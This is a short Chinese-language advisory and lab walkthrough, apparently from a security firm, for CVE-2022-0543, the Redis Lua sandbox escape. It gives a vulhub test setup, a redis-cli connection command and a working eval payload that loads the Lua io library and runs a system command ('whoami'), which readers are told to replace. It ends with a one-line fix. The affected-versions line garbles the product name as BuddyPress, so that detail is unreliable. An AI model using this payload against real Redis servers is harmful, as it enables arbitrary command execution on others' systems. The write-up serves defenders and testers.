CVE-2022-0543 Redis 沙盒逃逸漏洞

 

0x01漏洞概述

 
Debian 以及 Ubuntu 发行版的源在打包 Redis 时,Redis在Lua解析器初始化后,package变量没有被正确清除,导致攻击者可以利用它来进行Lua沙箱逃逸,从而执行任意系统命令。
 

0x02知识扩展

 
Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。
 

0x03风险等级

 
评定方式   等级
威胁等级   严重
影响面       广泛
 

0x04影响版本

 
5.0.0 <BuddyPress< 7.2.1
 

0x5漏洞环境搭建

 
攻击机
操作系统:kali
IP:192.168.182.128
靶机
操作系统:centos 7
IP:192.168.182.129
安装步骤
vulhub搭建漏洞靶场:
cd漏洞目录:
cd /root/vulhub-master/redis/CVE-2022-0543
运行容器(redis默认端口:6379):
  • docker-compose up -d

 
 

0x06漏洞验证

 
所需工具:
redis-cli安装教程:
  • https://help.aliyun.com/document_detail/43849.html
利用步骤(命令执行):
1、使用redis-cli先连接上数据库
命令(端口为默认):
  • redis-cli -h 192.168.182.129 -p 6379

 
2、payload直接利用
payload:
  • eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

 
箭头处是执行的命令,可自行修改。
 

0x07修复建议

 
Lua 初始化的末尾添加package=nil
 

0x08参考链接

 

https://wenku.baidu.com/view/cb85d82293c69ec3d5bbfd0a79563c1ec5dad70e.html
 
 
如果您遇到网络安全问题
欢迎致电:0991-8156363
或发送至:sudo@xjsec.cn
新疆海狼科技,您身边的网络安全助理